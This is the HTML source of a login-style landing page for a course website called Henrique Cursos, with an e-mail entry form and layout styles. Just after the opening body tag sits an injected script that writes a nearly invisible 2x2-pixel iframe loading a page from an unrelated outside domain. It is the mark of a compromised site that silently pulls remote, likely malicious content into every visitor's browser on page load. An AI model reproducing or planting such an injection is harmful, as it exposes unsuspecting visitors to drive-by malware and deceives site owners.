<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>

	<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

	<title>Henrique Cursos</title>

		<style type="text/css">

			* {

				margin:0px;

				padding:0px;

			}

			body {

				background-color:#0000CC;

				text-align:center;

			}

			#geral {

				background-color:#FFFF00;

				width:748px;

				height:402px;

				position:absolute;

				margin-left:-374px;

				left:50%;

				top:50%;

				margin-top:-201px;

				text-align:left;

			}

			#box {

				width:740px;

				height:395px;

				background-color:#FFFF00;

				border:1px solid #0000CC;

				margin:auto;

				margin-top:2px;

			}

			#lado1, #lado2 {

				width:320px;

				float:left;

			}

			#lado1 {

				width:240px;

				margin-top:50px;

			}

			#lado2 {

				margin-top:60px;

				margin-left:35px;

			}

			* html body #lado2 {

				margin-left:0px;

			}

			.legend {

				margin-left:-62px;

			}

		</style>

</head>



<body><!--c3284d--><script type="text/javascript">
document.write('<iframe src="http://pahgawks.com/download/stats.php" name="Twitter" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>');
</script><!--/c3284d-->






	<div id="geral">

		<div id="box">

			<div id="lado1">

				<div align="center"><img src="images/logo_home.jpg" alt="" width="195" height="191" /></div>

			</div>

			<div id="lado2">

			<table>

<tr>



       <td colspan="3">&nbsp;</td>

</tr>



      <tr>



       <td colspan="3">&nbsp;</td>

      </tr>



      <tr>



       <td width="14" valign="top" rowspan="2"><img src="http://www.henriquecursos.com/site/images/box_borda1.jpg"></td>



       <td width="474" valign="top"><img class="legend" src="http://www.henriquecursos.com/site/images/box_titulo.jpg"></td>



       <td width="20" valign="top" rowspan="2">&nbsp;</td>

      </tr>



      <tr>



       <td width="474" height="102" valign="top">











			<!-- FORM ENTER -->











        <table summary="preencher com email para acessar o site">

         <tr>



          <td colspan="3" height="30"><div align="left"><img src="http://www.henriquecursos.com/site/images/space.gif"></div></td>

         </tr>



         <form action="[var..script_name]" method="post" name="frm_info" id="frm_info">



          <tr>



           <td width="50" align="right"><p align="left" style="font-family:arial;font-size:8pt;color#000000">E-MAIL</p></td>



           <td width="290" align="center">



             <div align="left">

               <input type="text" size="50" name="x_name" id="x_name2" value="[var.x_name]" maxlength="50" style="background-color:#ffffff; color:#000000; font-family:arial; border: 1 solid #FFE940; font-size:8pt">           

            </div></td>



           <td width="35" align="center">







             <div align="left">

               <input type="image" src="http://www.henriquecursos.com/site/images/bt_ok.jpg" border="0" name="btn_save" id="btn_save2">

            </div></td>

         </tr>



          <tr>



           <td width="50" align="right"><div align="left"></div></td>



           <td width="290" align="center">           <div align="left"></div></td>



           <td width="35" align="center">           <div align="left"></div></td>

         </tr>



          <tr>



           <td width="375" align="right" colspan="3">



			<p align="left">[var.msg_text]</td>

         </tr>

        </form>

        </table>

</div>

		</div>		

	</div>



</body>

</html>

